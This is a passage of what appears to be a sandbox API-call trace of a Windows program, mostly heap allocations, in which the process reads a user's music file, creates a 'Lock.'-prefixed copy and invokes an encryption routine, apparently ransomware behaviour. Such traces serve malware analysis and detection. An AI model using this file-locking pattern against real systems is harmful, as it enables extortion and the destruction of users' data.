hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0246.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0246.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0246.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0246.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0246.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977938 | out: hHeap=0x970000) returned 1 [0246.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0246.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0246.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0246.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0246.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0246.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0246.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0246.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0246.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0246.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0246.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0246.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0246.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0246.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0246.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0246.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0246.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0246.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0246.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0246.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0246.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0246.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0246.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0246.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0246.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0246.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0246.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0246.349] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0246.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0246.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0246.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0246.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0246.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0246.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0246.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0246.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0246.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0246.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0246.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0246.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0246.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0246.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0246.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0246.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0246.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0246.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0246.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0246.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0246.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0246.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0246.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0246.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0246.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0246.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0246.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0246.351] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0246.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0246.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0246.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0246.351] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0246.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0246.351] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0246.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0246.351] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0246.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0246.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0246.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0246.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0246.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0246.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0246.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0246.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0246.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0246.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0246.351] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x3be0048 [0246.352] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0246.352] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0246.352] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\psWdx1ftUz7.m4a" (normalized: "c:\\users\\fd1hvy\\music\\pswdx1ftuz7.m4a"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0246.352] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.352] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0246.352] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e698c8 [0246.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0246.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0246.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0246.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0246.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0246.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0246.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0246.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0246.353] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0246.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0246.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0246.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0246.353] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0246.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0246.353] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0246.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0246.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0246.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0246.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0246.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0246.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0246.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0246.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0246.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0246.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0246.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0246.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x60) returned 0x978490 [0246.354] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0246.354] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music/" (normalized: "c:\\users\\fd1hvy\\music")) returned 0x11 [0246.354] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0246.354] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0246.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0246.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x2f04008 [0246.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0246.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0246.355] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music/Lock.psWdx1ftUz7.m4a" (normalized: "c:\\users\\fd1hvy\\music\\lock.pswdx1ftuz7.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0246.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a48 [0246.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0246.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0246.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0246.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0246.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0246.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0246.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0246.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0246.356] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0246.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0246.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0246.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b08 [0246.356] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0246.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b08 | out: hHeap=0x970000) returned 1 [0246.356] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0246.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0246.356] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0246.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0246.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0246.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0246.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0246.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0246.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0246.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0246.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0246.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0246.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0246.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0246.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0246.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0246.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0246.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0246.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0xe5c020 [0246.360] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0246.360] ReadFile (in: hFile=0x2d0, lpBuffer=0x3be0048, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0048*, lpNumberOfBytesRead=0x8cf4f8*=0xa0af, lpOverlapped=0x0) returned 1 [0246.363] ReadFile (in: hFile=0x2d0, lpBuffer=0x3be0048, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0048*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0246.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0246.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0246.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0246.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0246.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xa0af) returned 0x2f14010 [0246.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe5c020 | out: hHeap=0x970000) returned 1 [0246.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0246.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0246.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0246.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0246.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0246.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0246.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0246.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0246.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xa0af) returned 0x2f1e0c8 [0246.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14010 | out: hHeap=0x970000) returned 1 [0246.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0246.368] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0246.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0246.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0246.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0246.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0246.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0246.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xa0af) returned 0x2f14010 [0246.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0246.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14010 | out: hHeap=0x970000) returned 1 [0246.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0246.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0246.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0246.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0246.368] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0246.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0246.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0246.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0246.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0246.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0246.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0246.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0246.369] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0246.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0246.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ca8 [0246.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0246.369] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0246.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ca8 | out: hHeap=0x970000) returned 1 [0246.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0246.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0246.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ba8 [0246.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0246.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0246.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0246.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0246.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xa0af) returned 0x2f14010 [0246.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0246.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54be8 [0246.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0246.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0246.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0246.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c08 [0246.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0246.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0246.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0246.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c18 [0246.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0246.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0246.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0246.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d88 [0246.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0246.370] 